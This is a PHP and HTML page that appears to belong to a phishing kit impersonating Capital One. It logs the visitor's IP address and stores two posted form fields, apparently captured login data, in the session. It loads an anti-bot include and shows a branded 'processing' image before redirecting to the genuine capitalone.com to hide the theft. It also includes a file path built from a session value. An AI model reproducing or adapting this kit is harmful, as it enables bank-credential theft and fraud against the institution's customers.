<?php
session_start();
include ('bt.php');
@ini_set('display_errors', 0);
error_reporting(E_ALL ^ E_NOTICE);
$ib = getenv("REMOTE_ADDR");
date_default_timezone_set('GMT');
$crt = date("Y");
$dt=date("H:i:s");
include "./trad".$_SESSION['0001'];
@ini_set('display_errors', 0);
error_reporting(E_ALL ^ E_NOTICE);
$log = $_GET["log"];
$random=rand(0,100000000000);
$ran = md5($random);
$_SESSION[$ran] = $random;
$random=rand(0,100000000000);
$rans = md5($random);
$_SESSION[$rans] = $random;
$O1 = $_SESSION['1']=$_POST['1'];
$O2 = $_SESSION['2']=$_POST['2'];
?>

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Capital One</title>
</head>
<meta http-equiv="Refresh" content="05; url=https://www.capitalone.com/"></html>
<body>

<p><img border="0" src="images/18.png" width="1361" height="583"></p>
<div style="position: absolute; width: 100px; height: 100px; z-index: 1; left: 637px; top: 264px" id="layer1">
	<img border="0" src="images/u.gif" width="94" height="93"></div>

</body>

</html>
